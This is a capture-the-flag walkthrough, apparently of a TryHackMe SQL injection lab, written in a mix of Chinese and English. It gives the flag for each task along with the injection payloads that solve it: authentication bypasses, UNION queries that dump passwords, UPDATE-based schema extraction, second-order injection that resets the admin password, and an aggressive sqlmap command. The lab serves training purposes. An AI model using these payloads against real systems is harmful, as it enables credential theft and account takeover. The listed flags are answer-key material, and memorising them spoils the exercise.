SQL Injection Lab
文章目录
- SQL Injection Lab
- Task1 Introduction
- Task2 Introduction to SQL Injection: Part 1
- Task3 Introduction to SQL Injection: Part 2
- Task4 Vulnerable Startup: Broken Authentication
- Task5 Vulnerable Startup: Broken Authentication 2
- Task6 Vulnerable Startup: Broken Authentication 3 (Blind Injection)
- Task7 Vulnerable Startup: Vulnerable Notes
- Task8 Vulnerable Startup: Change Password
- Task9 Vulnerable Startup: Book Title
- Task10 Vulnerable Startup: Book Title 2
Task1 Introduction
Deploy the machine
Task2 Introduction to SQL Injection: Part 1
1.What is the flag for SQL Injection 1: Input Box Non-String?
THM{dccea429d73d4a6b4f117ac64724f460}
数字型 万能密码登陆
SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID=1 or 1=1 -- AND password = 'a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3'
2.What is the flag for SQL Injection 2: Input Box String?
THM{356e9de6016b9ac34e02df99a5f755ba}
字符型 万能密码登陆
SELECT uid,name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID = '1' or '1'='1' --' AND password = 'a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3'
3.What is the flag for SQL Injection 3: URL Injection?
THM{645eab5d34f81981f5705de54e8a9c36}
字符型 万能密码登陆,前端限制不允许输入特殊字符,burp截断后编码payload发送
SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID='1' or 1=1 --' AND password='6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'
4.What is the flag for SQL Injection 4: POST Injection?
THM{727334fd0f0ea1b836a8d443f09dc8eb}
字符型 万能密码登陆,前端限制不允许输入特殊字符,burp截断后在POST请求体中写入payload
SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID = '1' or 1=1--' AND password = '6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'
Task3 Introduction to SQL Injection: Part 2
What is the flag for SQL Injection 5: UPDATE Statement?
首先爆出表名为usertable和secrets,
UPDATE usertable SET nickName='',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='',email='123',password='a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3' WHERE UID='6'
爆出列名有id,author,secret
',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'),email='
爆出数据
',nickName=(SELECT group_concat(id || "," || author|| "," || secret|| ":") from secrets),email='
Task4 Vulnerable Startup: Broken Authentication
What is the flag for this challenge?
THM{f35f47dcd9d596f0d3860d14cd4c68ec}
万能密码绕过登陆
1' or 1=1--
Task5 Vulnerable Startup: Broken Authentication 2
What is the flag for this challenge?
THM{fb381dfee71ef9c31b93625ad540c9fa}
万能密码登陆,发现页面右上角存在显示位命令
' UNION SELECT 1,group_concat(password) FROM users-- -
爆出flag
Task6 Vulnerable Startup: Broken Authentication 3 (Blind Injection)
What is the flag for this challenge?
THM{f1f4e0757a09a0b87eeb2f33bca6a5cb}
sqlmap -u http://IP:5000/challenge3/login --data=“username=admin&password=admin” --level=5 --risk=3 --dbms=sqlite -a
Task7 Vulnerable Startup: Vulnerable Notes
What is the flag for this challenge?
THM{4644c7e157fd5498e7e4026c89650814}
二次注入
新建账户名为
'union select 1,group_concat(password) from users'
登陆之后点击Notes,程序执行
SELECT title, note FROM notes WHERE username = ''union select 1,group_concat(password) from users''
语句,爆出所有密码
Task8 Vulnerable Startup: Change Password
What is the flag for this challenge?
二次注入
新建一个名为 admin’-- - 的用户,登陆后更新密码可以更新admin账户的密码
UPDATE users SET password = ? WHERE username = 'admin' -- -'
Task9 Vulnerable Startup: Book Title
What is the flag for this challenge?
THM{27f8f7ce3c05ca8d6553bc5948a89210}
SELECT * from books WHERE id = (SELECT id FROM books WHERE title like '-1') union select 1,2,3,group_concat(password) from users-- -%')
Task10 Vulnerable Startup: Book Title 2
What is the flag for this challenge?
THM{183526c1843c09809695a9979a672f09}